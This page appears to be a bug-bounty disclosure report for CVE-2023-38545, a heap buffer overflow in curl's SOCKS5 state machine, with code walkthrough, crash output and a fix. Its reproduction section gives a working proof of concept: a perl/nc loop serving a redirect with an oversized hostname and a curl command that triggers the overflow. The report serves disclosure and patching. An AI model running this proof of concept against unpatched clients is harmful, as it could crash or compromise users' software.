Loading HuntDB...

CVE-2023-38545: socks5 heap buffer overflow

High
C
curl
Submitted None
Reported by raysatiro

Vulnerability Details

Technical details and impact analysis

Heap Overflow
# Summary: The SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met: 1. The request is made via socks5h. 2. The state machine's negotiation buffer is smaller than ~65k. 3. The SOCKS server's "hello" reply is delayed. 4. The attacker sets a final destination hostname larger than the negotiation buffer. libcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames larger than 255 but will not due to a state machine bug. For example tor user running libcurl app with follow location that connects to rogue onion server that replies with payload in `Location:` header which causes crash or worse. # Walkthrough: `do_SOCKS` initializes local variable `socks5_resolve_local` depending on the `CURLPROXY_` name. There are two relevant names for this state machine: - `CURLPROXY_SOCKS5` (SOCKS5 with local resolve of dest host) - `CURLPROXY_SOCKS5_HOSTNAME` (SOCKS5 with remote resolve of dest host) [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L573-L574) ~~~c bool socks5_resolve_local = (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE; ~~~ For this scenario, `CURLPROXY_SOCKS5_HOSTNAME` is the name and `socks5_resolve_local` is initialized FALSE. The `do_SOCKS` state machine is entered for the first time for the connection. `sx->state` is `CONNECT_SOCKS_INIT` (which happens to be the first label). In that state the hostname length is checked and if too long to resolve remotely (>255) then it sets `socks5_resolve_local` to TRUE. [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L588-L593) ~~~c /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */ if(!socks5_resolve_local && hostname_len > 255) { infof(data, "SOCKS5: server resolving disabled for hostnames of " "length > 255 [actual len=%zu]", hostname_len); socks5_resolve_local = TRUE; } ~~~ The local variable `socks5_resolve_local` is changed but, because this is a state machine, subsequent calls to `do_SOCKS` are in a different state and do not make the same change. ==**This is the bug.**== For this scenario, the hostname is longer than 255 characters and `do_SOCKS` is on a subsequent call, which means `socks5_resolve_local` remains FALSE. This can happen by chance or be forced by an attacker. The client "hello" SOCKS packet contains available methods and is sent to the server. State `CONNECT_SOCKS_READ_INIT` => `CONNECT_SOCKS_READ` is entered to parse the server "hello" packet (method selection reply). The server has not yet replied so `do_SOCKS` returns `CURLPX_OK`. [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L640-L662) ~~~c CONNECT_SOCKS_READ_INIT: case CONNECT_SOCKS_READ_INIT: sx->outstanding = 2; /* expect two bytes */ sx->outp = socksreq; /* store it here */ /* FALLTHROUGH */ case CONNECT_SOCKS_READ: presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT, "initial SOCKS5 response"); if(CURLPX_OK != presult) return presult; else if(sx->outstanding) { /* remain in reading state */ return CURLPX_OK; } else if(socksreq[0] != 5) { failf(data, "Received invalid version in initial SOCKS5 response."); return CURLPX_BAD_VERSION; } else if(socksreq[1] == 0) { /* DONE! No authentication needed. Send request. */ sxstate(sx, data, CONNECT_REQ_INIT); goto CONNECT_REQ_INIT; } ~~~ On a subsequent call `do_SOCKS` is in the same state where it's waiting for the initial server reply. If the reply is valid, and in this scenario it is, then the state machine will goto `CONNECT_REQ_INIT` which will goto `CONNECT_RESOLVE_REMOTE` since `socks5_resolve_local` is FALSE. [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L781-L797) ~~~c CONNECT_REQ_INIT: case CONNECT_REQ_INIT: if(socks5_resolve_local) { enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port, TRUE, &dns); if(rc == CURLRESOLV_ERROR) return CURLPX_RESOLVE_HOST; if(rc == CURLRESOLV_PENDING) { sxstate(sx, data, CONNECT_RESOLVING); return CURLPX_OK; } sxstate(sx, data, CONNECT_RESOLVED); goto CONNECT_RESOLVED; } goto CONNECT_RESOLVE_REMOTE; ~~~ In `CONNECT_RESOLVE_REMOTE` the hostname is copied into the socksreq buffer. The code assumes the hostname is <= 255 characters which as discussed above is not guaranteed. [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L904-L911) ~~~c else { socksreq[len++] = 3; socksreq[len++] = (char) hostname_len; /* one byte address length */ memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */ len += hostname_len; } infof(data, "SOCKS5 connect to %s:%d (remotely resolved)", sx->hostname, sx->remote_port); ~~~ `socksreq` points to the temporary download buffer (ie `data->state.buffer`) which was repurposed to send/receive the SOCKS negotiation since the transfer is not yet downloading. If the size of the hostname exceeds the remaining size of the buffer then there is a buffer overflow. If the size of the hostname maxes out but does not exceed the remaining size then there is an overflow when the buffer is next written to. Regardless, at this point we know from checks beforehand that hostname length is shorter than 65535 (`MAX_URL_LEN`) and the full size of buffer is at least `data->set.buffer_size + 1`. [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/url.c#L1808-L1811) ~~~c else if(strlen(data->state.up.hostname) > MAX_URL_LEN) { failf(data, "Too long host name (maximum is %d)", MAX_URL_LEN); return CURLE_URL_MALFORMAT; } ~~~ [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/multi.c#L1858-L1861) ~~~c CURLcode Curl_preconnect(struct Curl_easy *data) { if(!data->state.buffer) { data->state.buffer = malloc(data->set.buffer_size + 1); ~~~ `data->set.buffer_size` varies. Before the allocation above, libcurl has set `data->set.buffer_size` to a default 16384 (see `READBUFFER_SIZE` aka `CURL_MAX_WRITE_SIZE`) which could have been overridden by the user via `CURLOPT_BUFFERSIZE`. A significant example of this is the curl tool uses `CURLOPT_BUFFERSIZE` to set the size to its own default 102400, or user setting from `--limit-rate` if that value is smaller than 100k. The two buffer size configurations that are likely widely used are 16384+1 for libcurl apps without `CURLOPT_BUFFERSIZE` and 102400+1 for curl tool commands without a low `--limit-rate`. For the former the buffer can be overflowed and for the latter it can't: 16384+1 < 65535 < 102400+1. The characters that are allowed for hostname depend on if libcurl was built with IDN support. If it was built with IDN support then as long as the hostname contains characters < 0x80 no IDN conversion is attempted. For the higher value characters it seems very unlikely they would pass through but would depend on the IDN library. Without IDN support the characters pass through. For example `Location: http://\xff\r\n` will pass through without IDN. [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/idn.c#L131-L144) ~~~c bool Curl_is_ASCII_name(const char *hostname) { /* get an UNSIGNED local version of the pointer */ const unsigned char *ch = (const unsigned char *)hostname; if(!hostname) /* bad input, consider it ASCII! */ return TRUE; while(*ch) { if(*ch++ & 0x80) return FALSE; } return TRUE; } ~~~ [Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/idn.c#L261-L265) ~~~c #ifdef USE_IDN /* Check name for non-ASCII and convert hostname if we can */ if(!Curl_is_ASCII_name(host->name)) { char *decoded; CURLcode result = idn_decode(host->name, &decoded); ~~~ # Steps To Reproduce: The attacker needs to control the hostname. For example, the user has set `CURLOPT_FOLLOWLOCATION` (`--location` for the curl tool) so that libcurl will follow redirects. The attacker would need control of the hostname in the location header. The attacker needs the state machine to be delayed, as discussed earlier. For example, the attacker controls the SOCKS server and delays the initial server hello. The attacker probably needs to know how large `data->set.buffer_size` is and how the memory is typically allocated, like what comes after `data->state.buffer` in the heap. For example, the attacker has a copy of the program that is using libcurl and can debug it in a similar environment. # Supporting Material/References: ~~~ Unhandled exception at 0x6e1557be (libcurld.dll) in curld.exe: 0xC0000005: Access violation reading location 0x41414141. ~~~ Refer to attached screenshot Capture.PNG. ~~~ HEAP[curld.exe]: Heap block at 005F8200 modified at 005FC22D past requested size of 4025 ~~~ Note 4025 is in hex, in decimal it is 16421 which is 16384+1+heap guard bytes. ~~~ while true; do { perl -e 'print ("HTTP/1.1 301 Moved\r\nContent-Length: 0\r\nConnection: Close\r\nLocation: http://");print("A"x65535);print("\r\n\r\n")'; sleep 2; } | nc -4l [yourip] 8000; done ~~~ start a socks5 server on remoteip (for the latency) and run curl repeatedly until it reads from 0x41414141 (AAAAA....) ~~~ curl -v --limit-rate 16384 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000 ~~~ if making the socks server remote doesn't work for latency you'd have to modify its source or force it via libcurl source ~~~ case CONNECT_SOCKS_READ: + { + static bool x = 0; + if(++x == 2) + return CURLPX_OK; + } presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT, "initial SOCKS5 response"); ~~~ # Solution Refer to attached patch curl_security_fix.patch. It fixes the issue by changing the remote resolve check to return error `CURLPX_LONG_HOSTNAME` if dest host is larger than 255. ## Impact # Impact If the state machine is not delayed and works as intended then the resolution is made locally, which in my opinion a privacy violation because a local DNS query could possibly deanonymize a user who specifically requests socks5h. In my solution patch I do not allow it. If the state machine is delayed then the resolution is made remotely with a malformed SOCKS packet. The attacker has written to the heap and likely overwritten in-use data that come after `data->state.buffer`. It's undefined behavior at best and *possible* RCE at worst. I think if libcurl was built with IDN support then the worst case is much harder to achieve because only certain bytes can be in the hostname.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Heap Overflow